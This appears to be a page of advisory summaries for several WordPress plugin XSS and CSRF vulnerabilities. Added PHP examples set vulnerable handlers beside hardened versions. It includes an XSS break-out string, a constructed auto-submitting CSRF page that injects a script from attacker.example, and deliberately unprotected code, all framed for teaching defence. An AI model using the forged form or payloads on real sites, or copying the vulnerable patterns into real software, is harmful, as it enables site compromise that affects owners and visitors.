CVE-2022-44737 – WordPress All In One WP Security plugin <= 5.1.0 - Multiple Cross-Site Request Forgery (CSRF) vulnerabilities
https://notcve.org/view.php?id=CVE-2022-44737
Multiple Cross-Site Request Forgery vulnerabilities in the All-In-One Security (AIOS) – Security and Firewall WordPress plugin, versions <= 5.1.0. The cause is missing or incorrect nonce validation in the functions 'render_login_whitelist', 'render_rename_login' and 'render_honeypot', and possibly others. An unauthenticated attacker who can trick a site administrator into performing an action such as clicking a link can make the administrator's browser submit a forged request and so perform bulk actions on the plugin's list tables, such as deleting blocked IP entries.
• https://patchstack.com/database/vulnerability/all-in-one-wp-security-and-firewall/wordpress-all-in-one-wp-security-plugin-5-1-0-multiple-cross-site-request-forgery-csrf-vulnerabilities?_s_id=cve • CWE-352: Cross-Site Request Forgery (CSRF)
CVE-2022-3822 – Donations via PayPal < 1.9.9 - Admin+ Stored XSS
https://notcve.org/view.php?id=CVE-2022-3822
The Donations via PayPal WordPress plugin before 1.9.9 (that is, up to and including 1.9.8) does not sanitise its settings on save or escape them on output. A high-privilege user such as an administrator can therefore store arbitrary script in the settings, which executes whenever a user views an affected page, even when the unfiltered_html capability has been withheld from that user (for example in a multisite setup, where only the super admin holds it).
• https://wpscan.com/vulnerability/48ec2e4a-0190-4f36-afd1-d5799ba28c13 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVE-2022-2189 – WP Video Lightbox < 1.9.5 - Reflected Cross-Site Scripting
https://notcve.org/view.php?id=CVE-2022-2189
The WP Video Lightbox WordPress plugin before 1.9.5 (up to and including 1.9.4) echoes $_SERVER['REQUEST_URI'] into an HTML attribute without escaping it. REQUEST_URI is taken straight from the request line, so an unauthenticated attacker can reflect arbitrary script by getting a victim to open a crafted link. Current browsers percent-encode characters such as double quotes and angle brackets in the path before sending the request, so the attribute cannot be broken out of; the issue is exploitable in old web browsers that send such characters unencoded.
• https://wpscan.com/vulnerability/b6ed4d64-ee98-41bd-a97a-8350c2a8a546 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVE-2022-2194 – Accept Stripe Payments < 2.0.64 - Admin+ Stored Cross-Site Scripting
https://notcve.org/view.php?id=CVE-2022-2194
The Accept Stripe Payments WordPress plugin before 2.0.64 does not sanitize and escape some of its settings, allowing high-privilege users such as administrators to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.
• https://wpscan.com/vulnerability/ecf4b707-dea9-42d0-9ade-d788a9f97190 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
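The three XSS entries above (Donations via PayPal, WP Video Lightbox and Accept Stripe Payments) share one root cause: a value is stored with no sanitize callback and echoed with no output escaping, and a field that may hold HTML is not gated on the saver's unfiltered_html capability. The following is an added example, not code from any of these plugins, showing the vulnerable pattern beside the hardened one. It assumes it runs inside WordPress as plugin code; the option names, settings group, page slug and hook names are hypothetical.

```php
<?php
// Added example, not code from any plugin on this page. Assumes WordPress is loaded
// (plugin context). Option names, the settings group and the page slug are hypothetical.

// ---- Vulnerable pattern (what the advisories above describe) ----------------------

function demo_register_vulnerable() {
    // No sanitize_callback: whatever the admin posts is stored as-is, even on a
    // multisite where that admin does not hold unfiltered_html.
    register_setting( 'demo_settings', 'demo_widget_title' );
}

function demo_render_vulnerable() {
    // Stored XSS (CWE-79): a saved value of  "><script>alert(1)</script>  breaks out of
    // the attribute on every render of this page.
    $title = get_option( 'demo_widget_title', '' );
    echo '<input type="text" name="demo_widget_title" value="' . $title . '">';

    // Reflected XSS: REQUEST_URI is attacker-controlled through a crafted link. Current
    // browsers percent-encode " and < in the path before sending, so the break-out only
    // works in old browsers, which is the caveat in the WP Video Lightbox entry.
    echo '<form method="post" action="' . $_SERVER['REQUEST_URI'] . '">';
}

// ---- Hardened pattern --------------------------------------------------------------

// A field that legitimately holds HTML must still honour unfiltered_html: a saver
// without the capability gets the wp_kses_post() allow-list instead of raw markup.
function demo_sanitize_footer_html( $value ) {
    $value = is_string( $value ) ? $value : '';
    return current_user_can( 'unfiltered_html' ) ? $value : wp_kses_post( $value );
}

// 1. Sanitize on save. register_setting() runs the callback before update_option().
function demo_register_hardened() {
    register_setting(
        'demo_settings',
        'demo_widget_title',
        array( 'type' => 'string', 'sanitize_callback' => 'sanitize_text_field' )
    );
    register_setting(
        'demo_settings',
        'demo_footer_html',
        array( 'type' => 'string', 'sanitize_callback' => 'demo_sanitize_footer_html' )
    );
}
add_action( 'admin_init', 'demo_register_hardened' );

// 2. Escape on output, choosing the escaper for the context the value lands in.
function demo_render_hardened() {
    $title = get_option( 'demo_widget_title', '' );
    echo '<input type="text" name="demo_widget_title" value="' . esc_attr( $title ) . '">';

    // Preferably do not reflect REQUEST_URI at all: build the form action yourself.
    $action = admin_url( 'options-general.php?page=demo-settings' );
    echo '<form method="post" action="' . esc_url( $action ) . '">';

    // If it must be reflected, esc_url() drops quotes and angle brackets, encodes the
    // single quote and rejects javascript: schemes, so the attribute cannot be escaped.
    $self = isset( $_SERVER['REQUEST_URI'] ) ? wp_unslash( $_SERVER['REQUEST_URI'] ) : '';
    echo '<a href="' . esc_url( $self ) . '">Reload</a>';

    // The footer field was filtered according to the saver's capability at save time;
    // it is the one place raw markup is intended, so it is echoed as stored.
    echo get_option( 'demo_footer_html', '' );
}
```

The split matters: sanitize_text_field() on the way in stops the stored payload from ever reaching the database, and esc_attr() on the way out protects the attribute even if a value arrived through another code path (an import, a direct database edit, an older plugin version). Neither replaces the other.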
CVE-2022-1695 – WP Simple Adsense Insertion < 2.1 - Inject ads and javascript via CSRF
https://notcve.org/view.php?id=CVE-2022-1695
The WP Simple Adsense Insertion WordPress plugin before 2.1 performs no CSRF (nonce) check when its admin page is updated. An attacker can therefore trick a logged-in user with access to that page into submitting a forged form that manipulates the configured ads and, because the plugin's ad fields are meant to hold script, injects arbitrary JavaScript into the site.
• https://wpscan.com/vulnerability/2ac5b87b-1390-41ce-af6e-c50e5709baaa • CWE-352: Cross-Site Request Forgery (CSRF)
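Both CSRF entries on this page (All In One WP Security and WP Simple Adsense Insertion) come down to an admin-page handler that acts on a POST without verifying a nonce. The following is an added example, not code from either plugin, showing such a handler beside its hardened form together with the kind of attacker page that abuses it. It assumes it runs inside WordPress as plugin code; the page slug, option name, action and nonce names are hypothetical, and the attacker page and host names are constructed.

```php
<?php
// Added example, not code from either plugin named above. Assumes WordPress is loaded
// (plugin context); the page slug, option name, action and nonce names are hypothetical.

// ---- Vulnerable pattern: the handler trusts any POST that arrives with the admin's
// session cookie. The browser attaches cookies automatically, so a page on any origin
// can submit it. Constructed attacker page:
//
//   <form method="post" action="https://victim.example/wp-admin/admin.php?page=demo-ads">
//     <input type="hidden" name="demo_action" value="save">
//     <input type="hidden" name="demo_ad_code"
//            value="<script src=https://attacker.example/x.js></script>">
//   </form>
//   <script>document.forms[0].submit();</script>
//
// One visit by a logged-in admin and the injected script is served to every visitor.
function demo_handle_settings_vulnerable() {
    if ( isset( $_POST['demo_action'] ) && 'save' === $_POST['demo_action'] ) {
        // No nonce check, no capability check.
        update_option( 'demo_ad_code', wp_unslash( $_POST['demo_ad_code'] ) );
    }
}

// ---- Hardened pattern ------------------------------------------------------------

// The form carries a nonce bound to this action and to the current user's session.
function demo_render_settings_page() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin.php?page=demo-ads' ) ); ?>">
        <?php wp_nonce_field( 'demo_save_settings', 'demo_nonce' ); ?>
        <input type="hidden" name="demo_action" value="save">
        <textarea name="demo_ad_code" rows="6" cols="60"><?php
            echo esc_textarea( get_option( 'demo_ad_code', '' ) );
        ?></textarea>
        <?php submit_button( 'Save' ); ?>
    </form>
    <?php
}

function demo_handle_settings_hardened() {
    if ( ! isset( $_POST['demo_action'] ) || 'save' !== $_POST['demo_action'] ) {
        return;
    }

    // 1. Who may do this at all? The field is designed to hold a <script> snippet, so
    //    only users allowed to publish unfiltered HTML may write it. On multisite that
    //    excludes ordinary site administrators.
    if ( ! current_user_can( 'manage_options' ) || ! current_user_can( 'unfiltered_html' ) ) {
        wp_die( esc_html__( 'You are not allowed to change this setting.' ), '', array( 'response' => 403 ) );
    }

    // 2. Did this request come from a form WordPress rendered for this user? The nonce
    //    is not on the attacker's page, so a forged POST dies here. check_admin_referer()
    //    calls wp_die() on failure; use wp_verify_nonce() where a boolean is wanted.
    check_admin_referer( 'demo_save_settings', 'demo_nonce' );

    // 3. Only now touch state. Unslash first; WordPress adds magic quotes to $_POST.
    $code = isset( $_POST['demo_ad_code'] ) ? wp_unslash( $_POST['demo_ad_code'] ) : '';
    update_option( 'demo_ad_code', $code );
}
add_action( 'admin_init', 'demo_handle_settings_hardened' );
```

Two checks, not one: the nonce proves the request originated from a page WordPress generated for this user within the nonce lifetime (about a day), not that the user is authorized, so it never replaces the capability check. For bulk actions on a WP_List_Table, the AIOS case, core emits the nonce as `bulk-{plural}` in the table navigation and the handler should call `check_admin_referer( 'bulk-' . $this->_args['plural'] )` before acting on `$_REQUEST['action']`.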